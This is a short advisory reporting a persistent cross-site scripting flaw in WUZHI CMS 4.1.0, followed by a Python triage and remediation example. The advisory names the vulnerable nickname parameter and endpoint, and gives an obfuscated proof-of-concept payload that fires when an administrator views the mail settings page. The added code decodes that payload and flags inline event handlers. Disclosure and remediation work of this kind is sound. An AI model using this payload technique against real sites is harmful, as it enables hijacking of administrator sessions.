An XSS vulnerability was discovered in WUZHI CMS 4.1.0
There is a persistent XSS vulnerability which allows remote attackers to inject arbitrary web script or HTML via the form[nickname] parameter in a POST to /wuzhicms/www/index.php?m=core&f=set&v=sendmail&_su=wuzhicms&_menuid=24
When an administrator accesses System settings - Mail server, the XSS vulnerability is triggered successfully.
POC
xss payload: <details/open/ontoggle=eval(String.fromCharCode(97)+String.fromCharCode(108)+String.fromCharCode(101)+String.fromCharCode(114)+String.fromCharCode(116)+String.fromCharCode(40)+String.fromCharCode(50)+String.fromCharCode(41))>
Vulnerability trigger point
When an administrator accesses System settings - Mail server, the XSS vulnerability is triggered.
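For triage and remediation, the following added example (not part of the original report and not WUZHI CMS code) decodes the `String.fromCharCode` chain in the reported value so a reviewer can see what it evaluates, flags the inline event handler, and shows that HTML-encoding the stored nickname on output renders it inert. The function names and the `<input>` markup are assumptions made for illustration.

```python
import html
import re

# Payload string exactly as given in the report above.
REPORTED = (
    "<details/open/ontoggle=eval(String.fromCharCode(97)+String.fromCharCode(108)+"
    "String.fromCharCode(101)+String.fromCharCode(114)+String.fromCharCode(116)+"
    "String.fromCharCode(40)+String.fromCharCode(50)+String.fromCharCode(41))>"
)

_CALL = r"String\.fromCharCode\(\s*([\d\s,]+)\)"
_CHAIN = re.compile(_CALL + r"(?:\s*\+\s*" + _CALL + r")*")
# Heuristic for a tag carrying an on* attribute; meant for raw submitted
# values, not for already-rendered pages.
_HANDLER = re.compile(r"<[a-z][^>]*?[\s/]on[a-z]+\s*=", re.I)


def decode_charcodes(value):
    """Collapse each String.fromCharCode(..)+.. chain into the text it builds."""
    def _join(match):
        codes = []
        for group in re.findall(_CALL, match.group(0)):
            codes.extend(int(n) for n in group.split(",") if n.strip())
        # fromCharCode keeps only the low 16 bits of each argument
        return "".join(chr(c & 0xFFFF) for c in codes)
    return _CHAIN.sub(_join, value)


def triage(value):
    """Summarise a submitted form[nickname] value for a reviewer."""
    return {
        "decoded": decode_charcodes(value),
        "event_handler": bool(_HANDLER.search(value)),
    }


def render_field(nickname):
    """Hypothetical settings-form field with the stored value HTML-encoded."""
    safe = html.escape(nickname, quote=True)
    return f'<input type="text" name="form[nickname]" value="{safe}">'


if __name__ == "__main__":
    print(triage(REPORTED))
    print(render_field(REPORTED))
```

In the PHP application itself, the corresponding output encoding is `htmlspecialchars($value, ENT_QUOTES, 'UTF-8')` applied where the stored nickname is written into the mail server settings page.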